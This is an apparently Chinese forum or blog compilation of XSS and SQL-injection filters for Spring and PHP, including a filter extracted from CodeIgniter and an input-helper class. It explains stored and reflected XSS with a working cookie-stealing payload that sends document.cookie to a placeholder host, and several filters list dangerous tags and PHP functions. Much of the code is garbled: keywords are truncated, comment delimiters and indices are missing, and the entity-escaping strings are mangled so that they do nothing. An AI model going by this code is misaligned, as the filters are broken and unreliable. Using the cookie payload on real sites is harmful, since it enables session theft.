https://bitbucket.org/mrxx/mrxx-php-lib/src/00bcdc20b9b9/security/Security.php
http://www.ibm.com/developerworks/cn/xml/x-ajaxsecurity.html
PHP IDS ,能有效防止XSS,CSRF,SQL注入,数字溢出等,最新版有77种规则防止。我目前正在一些正式线上环境试用中。
以前把它放在PHP全局配置auto_prepend_file中,不过由于规则较严格,容易误判不好控制,所以现在放在单独的项目中应用。
在Web项目中,通常需要处理XSS,SQL注入攻击,解决这个问题有两个思路:
- 在数据进入数据库之前对非法字符进行转义,在更新和显示的时候将非法字符还原
- 在显示的时候对非法字符进行转义
如果项目还处在起步阶段,建议使用第二种,直接使用jstl的<c:out>标签即可解决非法字符的问题。当然,对于Javascript还需要自己处理一下,写一个方法,在解析从服务器端获取的数据时执行以下escapeHTML()即可。
附:Javascript方法:
String.prototype.escapeHTML = function () {
return this.replace(/&/g, ‘&’).replace(/>/g, ‘>’).replace(/</g, ‘<’).replace(/”/g, ‘"’);
}
如果项目已经开发完成了,又不想大批量改动页面的话,可以采用第一种方法,此时需要借助Spring MVC的@InitBinder以及org.apache.commons.lang.PropertyEditorSupport、org.apache.commons.lang.StringEscapeUtils
public class StringEscapeEditor extends PropertyEditorSupport {
private boolean escapeHTML;
private boolean escapeJavaScript;
private boolean escapeSQL;public StringEscapeEditor() { super(); }
public StringEscapeEditor(boolean escapeHTML, boolean escapeJavaScript, boolean escapeSQL) {
super();
this.escapeHTML = escapeHTML;
this.escapeJavaScript = escapeJavaScript;
this.escapeSQL = escapeSQL;
}@Override
public void setAsText(String text) {
if (text == null) {
setValue(null);
} else {
String value = text;
if (escapeHTML) { value = StringEscapeUtils.escapeHtml(value); }
if (escapeJavaScript) { value = StringEscapeUtils.escapeJavaScript(value); }
if (escapeSQL) { value = StringEscapeUtils.escapeSql(value); } setValue(value); }
}@Override
public String getAsText() { Object value = getValue(); return value != null ? value.toString() : “”; }
}
在使用StringEscapeUtils时需要注意escapeHtml和escapeJavascript方法会把中文字符转换成Unicode编码,如果通过<c:out>标签或者EL表达式展示时,能够正确还原,但是如果使用类似于Ext这样的前端组件来展示这部分内容时,不能正常还原,这也是我为什么放弃了第一种方法,直接使用第二种方法的原因。
在上面我们做了一个EscapeEditor,下面还要将这个Editor和Spring的Controller绑定,使服务器端接收到数据之后能够自动转移特殊字符。
下面我们在@Controller中注册@InitBinder
@InitBinder
public void initBinder(WebDataBinder binder) {
binder.registerCustomEditor(String.class, new StringEscapeEditor(false, false, false));
}
这个方法可以直接放到abstract Controller类中,这样子每个Controller实例都能够拥有该方法。至此第二种方法完成,但是在还原的方法暂时还没有。
之前我从CI框架中抽取了一个,用在团购系统中了,感觉不错
<?php
// 从CI 框架中抽取出来的 XSS 代码过滤 2011年7月4日 17:09:30 by kenxu
function remove_invisible_characters($str)
{
static $non_displayables;
if ( ! isset($non_displayables))
{
// every control character except newline (dec 10), carriage return (dec 13), and horizontal tab (dec 09),
$non_displayables = array(
'/%0[0-8bcef]/', // url encoded 00-08, 11, 12, 14, 15
'/%1[0-9a-f]/', // url encoded 16-31
'/[\x00-\x08]/', // 00-08
'/\x0b/', '/\x0c/', // 11, 12
'/[\x0e-\x1f]/' // 14-31
);
}
do
{
$cleaned = $str;
$str = preg_replace($non_displayables, '', $str);
}
while ($cleaned != $str);
return $str;
}
class XSS {
public $xss_hash = '';
public $csrf_hash = '';
public $csrf_expire = 7200; // Two hours (in seconds)
public $csrf_token_name = 'csrf_token';
public $csrf_cookie_name = 'csrf_token';
/* never allowed, string replacement */
public $never_allowed_str = array(
'document.cookie' => '[removed]',
'document.write' => '[removed]',
'.parentNode' => '[removed]',
'.innerHTML' => '[removed]',
'window.location' => '[removed]',
'-moz-binding' => '[removed]',
'<!--' => '<!--',
'-->' => '-->',
'<![CDATA[' => '<![CDATA['
);
/* never allowed, regex replacement */
public $never_allowed_regex = array(
"javascript\s*:" => '[removed]',
"expression\s*(\(|&\#40;)" => '[removed]', // CSS and IE
"vbscript\s*:" => '[removed]', // IE, surprise!
"Redirect\s+302" => '[removed]'
);
public function __construct()
{
}
// --------------------------------------------------------------------
/**
* XSS Clean
*
* Sanitizes data so that Cross Site Scripting Hacks can be
* prevented. This function does a fair amount of work but
* it is extremely thorough, designed to prevent even the
* most obscure XSS attempts. Nothing is ever 100% foolproof,
* of course, but I haven't been able to get anything passed
* the filter.
*
* Note: This function should only be used to deal with data
* upon submission. It's not something that should
* be used for general runtime processing.
*
* This function was based in part on some code and ideas I
* got from Bitflux: http://channel.bitflux.ch/wiki/XSS_Prevention
*
* To help develop this script I used this great list of
* vulnerabilities along with a few other hacks I've
* harvested from examining vulnerabilities in other programs:
* http://ha.ckers.org/xss.html
*
* @access public
* @param mixed string or array
* @return string
*/
public function xss_clean($str)
{
/*
* Is the string an array?
*
*/
if (is_array($str))
{
while (list($key) = each($str))
{
$str[$key] = $this->xss_clean($str[$key]);
}
return $str;
}
/*
* Remove Invisible Characters
*/
$str = remove_invisible_characters($str);
/*
* Protect GET variables in URLs
*/
// 901119URL5918AMP18930PROTECT8198
$str = preg_replace('|\&([a-z\_0-9\-]+)\=([a-z\_0-9\-]+)|i', $this->xss_hash()."\\1=\\2", $str);
/*
* Validate standard character entities
*
* Add a semicolon if missing. We do this to enable
* the conversion of entities to ASCII later.
*
*/
$str = preg_replace('#(&\#?[0-9a-z]{2,})([\x00-\x20])*;?#i', "\\1;\\2", $str);
/*
* Validate UTF16 two byte encoding (x00)
*
* Just as above, adds a semicolon if missing.
*
*/
$str = preg_replace('#(&\#x?)([0-9A-F]+);?#i',"\\1\\2;",$str);
/*
* Un-Protect GET variables in URLs
*/
$str = str_replace($this->xss_hash(), '&', $str);
/*
* URL Decode
*
* Just in case stuff like this is submitted:
*
* <a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">Google</a>
*
* Note: Use rawurldecode() so it does not remove plus signs
*
*/
$str = rawurldecode($str);
/*
* Convert character entities to ASCII
*
* This permits our tests below to work reliably.
* We only convert entities that are within tags since
* these are the ones that will pose security problems.
*
*/
$str = preg_replace_callback("/[a-z]+=([\'\"]).*?\\1/si", array($this, '_convert_attribute'), $str);
$str = preg_replace_callback("/<\w+.*?(?=>|<|$)/si", array($this, '_decode_entity'), $str);
/*
* Remove Invisible Characters Again!
*/
$str = remove_invisible_characters($str);
/*
* Convert all tabs to spaces
*
* This prevents strings like this: ja vascript
* NOTE: we deal with spaces between characters later.
* NOTE: preg_replace was found to be amazingly slow here on large blocks of data,
* so we use str_replace.
*
*/
if (strpos($str, "\t") !== FALSE)
{
$str = str_replace("\t", ' ', $str);
}
/*
* Capture converted string for later comparison
*/
$converted_string = $str;
/*
* Not Allowed Under Any Conditions
*/
foreach ($this->never_allowed_str as $key => $val)
{
$str = str_replace($key, $val, $str);
}
foreach ($this->never_allowed_regex as $key => $val)
{
$str = preg_replace("#".$key."#i", $val, $str);
}
/*
* Makes PHP tags safe
*
* Note: XML tags are inadvertently replaced too:
*
* <?xml
*
* But it doesn't seem to pose a problem.
*
*/
if ($is_image === TRUE)
{
// Images have a tendency to have the PHP short opening and closing tags every so often
// so we skip those and only do the long opening tags.
$str = preg_replace('/<\?(php)/i', "<?\\1", $str);
}
else
{
$str = str_replace(array('<?', '?'.'>'), array('<?', '?>'), $str);
}
/*
* Compact any exploded words
*
* This corrects words like: j a v a s c r i p t
* These words are compacted back to their correct state.
*
*/
$words = array('javascript', 'expression', 'vbscript', 'script', 'applet', 'alert', 'document', 'write', 'cookie', 'window');
foreach ($words as $word)
{
$temp = '';
for ($i = 0, $wordlen = strlen($word); $i < $wordlen; $i++)
{
$temp .= substr($word, $i, 1)."\s*";
}
// We only want to do this when it is followed by a non-word character
// That way valid stuff like "dealer to" does not become "dealerto"
$str = preg_replace_callback('#('.substr($temp, 0, -3).')(\W)#is', array($this, '_compact_exploded_words'), $str);
}
/*
* Remove disallowed Javascript in links or img tags
* We used to do some version comparisons and use of stripos for PHP5, but it is dog slow compared
* to these simplified non-capturing preg_match(), especially if the pattern exists in the string
*/
do
{
$original = $str;
if (preg_match("/<a/i", $str))
{
$str = preg_replace_callback("#<a\s+([^>]*?)(>|$)#si", array($this, '_js_link_removal'), $str);
}
if (preg_match("/<img/i", $str))
{
$str = preg_replace_callback("#<img\s+([^>]*?)(\s?/?>|$)#si", array($this, '_js_img_removal'), $str);
}
if (preg_match("/script/i", $str) OR preg_match("/xss/i", $str))
{
$str = preg_replace("#<(/*)(script|xss)(.*?)\>#si", '[removed]', $str);
}
}
while ($original != $str);
unset($original);
/*
* Remove JavaScript Event Handlers
*
* Note: This code is a little blunt. It removes
* the event handler and anything up to the closing >,
* but it's unlikely to be a problem.
*
*/
$event_handlers = array('[^a-z_\-]on\w*','xmlns');
$str = preg_replace("#<([^><]+?)(".implode('|', $event_handlers).")(\s*=\s*[^><]*)([><]*)#i", "<\\1\\4", $str);
/*
* Sanitize naughty HTML elements
*
* If a tag containing any of the words in the list
* below is found, the tag gets converted to entities.
*
* So this: <blink>
* Becomes: <blink>
*
*/
$naughty = 'alert|applet|audio|basefont|base|behavior|bgsound|blink|body|embed|expression|form|frameset|frame|head|html|ilayer|iframe|input|isindex|layer|link|meta|object|plaintext|style|script|textarea|title|video|xml|xss';
$str = preg_replace_callback('#<(/*\s*)('.$naughty.')([^><]*)([><]*)#is', array($this, '_sanitize_naughty_html'), $str);
/*
* Sanitize naughty scripting elements
*
* Similar to above, only instead of looking for
* tags it looks for PHP and JavaScript commands
* that are disallowed. Rather than removing the
* code, it simply converts the parenthesis to entities
* rendering the code un-executable.
*
* For example: eval('some code')
* Becomes: eval('some code')
*
*/
$str = preg_replace('#(alert|cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)\((.*?)\)#si', "\\1\\2(\\3)", $str);
/*
* Final clean up
*
* This adds a bit of extra precaution in case
* something got through the above filters
*
*/
foreach ($this->never_allowed_str as $key => $val)
{
$str = str_replace($key, $val, $str);
}
foreach ($this->never_allowed_regex as $key => $val)
{
$str = preg_replace("#".$key."#i", $val, $str);
}
return $str;
}
// --------------------------------------------------------------------
/**
* Random Hash for protecting URLs
*
* @access public
* @return string
*/
public function xss_hash()
{
if ($this->xss_hash == '')
{
if (phpversion() >= 4.2)
mt_srand();
else
mt_srand(hexdec(substr(md5(microtime()), -8)) & 0x7fffffff);
$this->xss_hash = md5(time() + mt_rand(0, 1999999999));
}
return $this->xss_hash;
}
// --------------------------------------------------------------------
/**
* Compact Exploded Words
*
* Callback function for xss_clean() to remove whitespace from
* things like j a v a s c r i p t
*
* @access private
* @param type
* @return type
/
ivate function _compact_exploded_words($matches)
return preg_replace('/\s+/s', '', $matches).$matches[2];
}
// --------------------------------------------------------------------
/**
* Sanitize Naughty HTML
*
* Callback function for xss_clean() to remove naughty HTML elements
*
* @access private
* @param array
* @return string
/
ivate function _sanitize_naughty_html($matches)
// encode opening brace
$str = '<'.$matches.$matches[2].$matches[3];
// encode captured opening or closing brace to prevent recursive vectors
$str .= str_replace(array('>', '<'), array('>', '<'), $matches[4]);
return $str;
}
// --------------------------------------------------------------------
/**
* JS Link Removal
*
* Callback function for xss_clean() to sanitize links
* This limits the PCRE backtracks, making it more performance friendly
* and prevents PREG_BACKTRACK_LIMIT_ERROR from being triggered in
* PHP 5.2+ on link-heavy strings
*
* @access private
* @param array
* @return string
/
ivate function _js_link_removal($match)
$attributes = $this->_filter_attributes(str_replace(array('<', '>'), '', $match));
return str_replace($match[1], preg_replace("#href=.*?(alert\(|alert&\#40;|javascript\:|charset\=|window\.|document\.|\.cookie|<script|<xss|base64\s*,)#si", "", $attributes), $match[0]);
}
/**
* JS Image Removal
*
* Callback function for xss_clean() to sanitize image tags
* This limits the PCRE backtracks, making it more performance friendly
* and prevents PREG_BACKTRACK_LIMIT_ERROR from being triggered in
* PHP 5.2+ on image tag heavy strings
*
* @access private
* @param array
* @return string
/
ivate function _js_img_removal($match)
$attributes = $this->_filter_attributes(str_replace(array('<', '>'), '', $match));
return str_replace($match[1], preg_replace("#src=.*?(alert\(|alert&\#40;|javascript\:|charset\=|window\.|document\.|\.cookie|<script|<xss|base64\s*,)#si", "", $attributes), $match[0]);
}
// --------------------------------------------------------------------
/**
* Attribute Conversion
*
* Used as a callback for XSS Clean
*
* @access private
* @param array
* @return string
*/
private function _convert_attribute($match)
{
return str_replace(array('>', '<', '\\'), array('>', '<', '\\\\'), $match);
}
// --------------------------------------------------------------------
/**
* Filter Attributes
*
* Filters tag attributes for consistency and safety
*
* @access private
* @param string
* @return string
*/
private function _filter_attributes($str)
{
$out = '';
if (preg_match_all('#\s*[a-z\-]+\s*=\s*(\042|\047)([^\\1]*?)\\1#is', $str, $matches))
{
foreach ($matches as $match)
{
$out .= preg_replace("#/\*.*?\*/#s", '', $match);
}
}
return $out;
}
// --------------------------------------------------------------------
/**
* HTML Entity Decode Callback
*
* Used as a callback for XSS Clean
*
* @access private
* @param array
* @return string
*/
private function _decode_entity($match)
{
return $this->entity_decode($match, 'UTF-8');
}
// --------------------------------------------------------------------
/**
* HTML Entities Decode
*
* This function is a replacement for html_entity_decode()
*
* In some versions of PHP the native function does not work
* when UTF-8 is the specified character set, so this gives us
* a work-around. More info here:
* http://bugs.php.net/bug.php?id=25670
*
* NOTE: html_entity_decode() has a bug in some PHP versions when UTF-8 is the
* character set, and the PHP developers said they were not back porting the
* fix to versions other than PHP 5.x.
*
* @access public
* @param string
* @param string
* @return string
*/
public function entity_decode($str, $charset='UTF-8')
{
if (stristr($str, '&') === FALSE) return $str;
// The reason we are not using html_entity_decode() by itself is because
// while it is not technically correct to leave out the semicolon
// at the end of an entity most browsers will still interpret the entity
// correctly. html_entity_decode() does not convert entities without
// semicolons, so we are left with our own little solution here. Bummer.
if (function_exists('html_entity_decode') && (strtolower($charset) != 'utf-8' OR is_php('5.0.0')))
{
$str = html_entity_decode($str, ENT_COMPAT, $charset);
$str = preg_replace('~&#x(0*[0-9a-f]{2,5})~ei', 'chr(hexdec("\\1"))', $str);
return preg_replace('~&#([0-9]{2,4})~e', 'chr(\\1)', $str);
}
// Numeric Entities
$str = preg_replace('~&#x(0*[0-9a-f]{2,5});{0,1}~ei', 'chr(hexdec("\\1"))', $str);
$str = preg_replace('~&#([0-9]{2,4});{0,1}~e', 'chr(\\1)', $str);
// Literal Entities - Slightly slow so we do another check
if (stristr($str, '&') === FALSE)
{
$str = strtr($str, array_flip(get_html_translation_table(HTML_ENTITIES)));
}
return $str;
}
// --------------------------------------------------------------------
/**
* Filename Security
*
* @access public
* @param string
* @return string
*/
public function sanitize_filename($str, $relative_path = FALSE)
{
$bad = array(
"../",
"<!--",
"-->",
"<",
">",
"'",
'"',
'&',
'$',
'#',
'{',
'}',
'[',
']',
'=',
';',
'?',
"%20",
"%22",
"%3c", // <
"%253c", // <
"%3e", // >
"%0e", // >
"%28", // (
"%29", // )
"%2528", // (
"%26", // &
"%24", // $
"%3f", // ?
"%3b", // ;
"%3d" // =
);
if ( ! $relative_path)
{
$bad[] = './';
$bad[] = '/';
}
return stripslashes(str_replace($bad, '', $str));
}
}
XSS攻击分为存储型和反射型漏洞。
存储型XSS:在可编辑的地方构造,会写入DB(或静态页面)。客户端请求页面时运行JS、VbS脚本可以盗取Cookie、挂马。
反射型XSS:客户端浏览器会把URL中的参数一起显示。比如:请求http://xx.xxxxxxxx.com/?act=guest.oftenquestion&sa_id=15&keyword="><script>var i=new Image;i.src="http://xxxxx/getcookie.php?c="%2bdocument.cookie;</script>
keyword后为构造的JS内容,执行后可以获得用户Cookie。
前端html漏洞位置为:<input type="text" value="装备" name="keyword" style="width:200px;"> 装备位置是keyword=后跟的查询字段,使用">闭合前面的value="。
对于这两种XSS的攻击,只需要过滤掉"引号"、“<”、“>”等特殊符号,可以使用htmlspecialchars函数把提交过来的参数过滤一下。
ajax有个类型参数采用jsonp验证这个蛮安全。
主要对入库的字符串进行验证。防止一般攻击应该没啥问题吧。
那我也贴一个我之前用的哇
defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
class Helper_Input {
public static function filterVar() {
unset($GLOBALS, $_ENV, $HTTP_GET_VARS, $HTTP_POST_VARS,
$HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_ENV_VARS);
$_GET = self::addslashes($_GET, 1, true);
$_POST = self::addslashes($_POST, 1, true);
$_COOKIE = self::addslashes($_COOKIE, 1, true);
$_SERVER = self::addslashes($_SERVER);
$_FILES = self::addslashes($_FILES);
$_REQUEST = self::addslashes($_REQUEST, 1, true);
}
public static function addslashes($str, $force = 0, $strip = false) {
if (!MAGIC_QUOTES_GPC || $force) {
if (is_array($str)) {
foreach ($str as $key => $value){
$str[$key] = self::addslashes($value, $force, $strip);
}
} else {
$str = addslashes($strip ? stripslashes($str) : $str);
}
}
return $str;
}
public static function stripslashes($str) {
if(is_array($str)) {
foreach($str as $key=>$value) {
$str[$key] = self::stripslashes($value);
}
} else {
$str = stripslashes($str);
}
return $str;
}
public static function htmlspecialchars($str) {
if(is_array($str)) {
foreach($str as $key => $val) {
$str[$key] = self::htmlspecialchars($val);
}
} else {
$str = preg_replace('/&(( #(\d{3,5}|x[a-fA-F0-9]{4})|[a-zA-Z][a-z0-9]{2,5});)/', '&\\1',
str_replace(array('&', '"', '<', '>'), array('&', '"', '<', '>'), $str));
}
return $str;
}
/**
* 过滤特殊字符
*/
public static function filterSpecialWord($str){
return preg_replace('/>|<|,|\[|\]|\{|\}|\?|\/|\+|=|\||\'|\\|\"|:|;|\~|\!|\@|\ #|\*|\$|\%|\^|\&|\(|\)|`/i', "", $str);
}
/**
* 过滤SQL注入攻击字符串
*
* @param string $str 需要过滤的字符串
* @param resource $db 数据库连接,可以为空
* @return string
*/
public static function filterSql($str, $db = null) {
if (!MAGIC_QUOTES_GPC) {
if ($db) {
return mysql_real_escape_string($str, $db);
}
return mysql_escape_string($str);
} else {
$str = self::addslashes($str, 1);
}
return $str;
}
/**
* 过滤HTML标签
*
* @param string text - 传递进去的文本内容
* @param bool $strict - 是否严格过滤(严格过滤将把所有已知HTML标签开头的内容过滤掉)
* @return string 返回替换后的结果
*/
public static function stripHtmlTag($text, $strict=false) {
$text = strip_tags($text);
if (!$strict){
return $text;
}
$html_tag = "/<[\/|!]?(html|head|body|div|span|DOCTYPE|title|link|meta|style|p|h1|h2|h3|h4|h5|h6|strong|em|abbr|acronym|address|bdo|blockquote|cite|q|code|ins|del|dfn|kbd|pre|samp|var|br|a|base|img|area|map|object|param|ul|ol|li|dl|dt|dd|table|tr|td|th|tbody|thead|tfoot|col|colgroup|caption|form|input|textarea|select|option|optgroup|button|label|fieldset|legend|script|noscript|b|i|tt|sub|sup|big|small|hr)[^>]*>/is";
return preg_replace($html_tag, "", $text);
}
/**
* 文件名安全
* @param $str String 文件名
* @return String
*/
public static function secureFilename($str) {
$bad = array(
"../",
"./",
"<!--",
"-->",
"<",
">",
"'",
'"',
'&',
'$',
' #',
'{',
'}',
'[',
']',
'=',
';',
'?',
"%20",
"%22",
"%3c", // <
"%253c", // <
"%3e", // >
"%0e", // >
"%28", // (
"%29", // )
"%2528", // (
"%26", // &
"%24", // $
"%3f", // ?
"%3b", // ;
"%3d" // =
);
return stripslashes(str_replace($bad, '', $str));
}
/**
* Removes potential XSS code from an input string.
*
* Using an external class by Travis Puderbaugh <kallahar@quickwired.com>
*
* @param string Input string
* @param string s)replaceString for inserting in keywords (which destroyes the tag
* @return string Input string with potential XSS code removed
*/
public static function cleanXSS($val, $replaceString = '<x>') {
// don't use empty $replaceString because then no XSS-remove will be done
if ($replaceString == '') {
$replaceString = '<x>';
}
// remove all non-printable characters. CR(0a) and LF(0b) and TAB are allowed
// this prevents some character re-spacing such as <java\0script>
// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
$val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x19])/', '', $val);
// straight replacements, the user should never need these since they're normal characters
// this prevents like <IMG SRC=@avascript:alert('XSS')>
$search = '/& #[xX]0{0,8}(21|22|23|24|25|26|27|28|29|2a|2b|2d|2f|30|31|32|33|34|35|36|37|38|39|3a|3b|3d|3f|40|41|42|43|44|45|46|47|48|49|4a|4b|4c|4d|4e|4f|50|51|52|53|54|55|56|57|58|59|5a|5b|5c|5d|5e|5f|60|61|62|63|64|65|66|67|68|69|6a|6b|6c|6d|6e|6f|70|71|72|73|74|75|76|77|78|79|7a|7b|7c|7d|7e);?/ie';
$val = preg_replace($search, "chr(hexdec('\\1'))", $val);
$search = '/?{0,8}(33|34|35|36|37|38|39|40|41|42|43|45|47|48|49|50|51|52|53|54|55|56|57|58|59|61|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126);?/ie';
$val = preg_replace($search, "chr('\\1')", $val);
// now the only remaining whitespace attacks are \t, \n, and \r
$ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
$ra_tag = array('applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
$ra_attribute = array('style', 'onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
$ra_protocol = array('javascript', 'vbscript', 'expression');
//remove the potential & #xxx; stuff for testing
$val2 = preg_replace('/(& #[xX]?0{0,8}(9|10|13|a|b);)*\s*/i', '', $val);
$ra = array();
foreach ($ra1 as $ra1word) {
//stripos is faster than the regular expressions used later
//and because the words we're looking for only have chars < 0x80
//we can use the non-multibyte safe version
if (stripos($val2, $ra1word ) !== false ) {
//keep list of potential words that were found
if (in_array($ra1word, $ra_protocol)) {
$ra[] = array($ra1word, 'ra_protocol');
}
if (in_array($ra1word, $ra_tag)) {
$ra[] = array($ra1word, 'ra_tag');
}
if (in_array($ra1word, $ra_attribute)) {
$ra[] = array($ra1word, 'ra_attribute');
}
//some keywords appear in more than one array
//these get multiple entries in $ra, each with the appropriate type
}
}
//only process potential words
if (count($ra) > 0) {
// keep replacing as long as the previous round replaced something
$found = true;
while ($found == true) {
$val_before = $val;
for ($i = 0; $i < sizeof($ra); $i++) {
$pattern = '';
for ($j = 0; $j < strlen($ra[$i]); $j++) {
if ($j > 0) {
$pattern .= '((& #[xX]0{0,8}([9ab]);)|(?{0,8}(9|10|13);)|\s)*';
}
$pattern .= $ra[$i][0][$j];
}
//handle each type a little different (extra conditions to prevent false positives a bit better)
switch ($ra[$i][1]) {
case 'ra_protocol':
//these take the form of e.g. 'javascript:'
$pattern .= '((& #[xX]0{0,8}([9ab]);)|(?{0,8}(9|10|13);)|\s)*(?=:)';
break;
case 'ra_tag':
//these take the form of e.g. '<script[^\da-z] ....';
$pattern = '(?<=<)' . $pattern . '((& #[xX]0{0,8}([9ab]);)|(?{0,8}(9|10|13);)|\s)*(?=[^\da-z])';
break;
case 'ra_attribute':
//these take the form of e.g. 'οnlοad=' Beware that a lot of characters are allowed
//between the attribute and the equal sign!
$pattern .= '[\s\!\ #\$\%\&\(\)\*\~\+\-\_\.\,\:\;\?\@\[\/\|\\\\\]\^\`]*(?==)';
break;
}
$pattern = '/' . $pattern . '/i';
// add in <x> to nerf the tag
$replacement = substr_replace($ra[$i], $replaceString, 2, 0);
// filter out the hex tags
$val = preg_replace($pattern, $replacement, $val);
if ($val_before == $val) {
// no replacements were made, so exit the loop
$found = false;
}
}
}
}
return $val;
}
}